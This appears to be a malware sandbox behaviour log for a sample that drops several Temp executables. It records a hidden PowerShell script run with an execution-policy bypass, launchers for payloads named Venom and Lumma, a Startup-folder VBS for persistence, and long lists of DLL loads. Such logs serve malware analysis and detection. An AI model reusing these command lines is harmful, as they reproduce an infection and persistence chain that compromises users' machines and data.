Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 1680
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe C:\Users\user\AppData\Local\Temp\8EC7.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EF14.exe C:\Users\user\AppData\Local\Temp\EF14.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2D42.exe C:\Users\user\AppData\Local\Temp\2D42.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: winhttp.dll
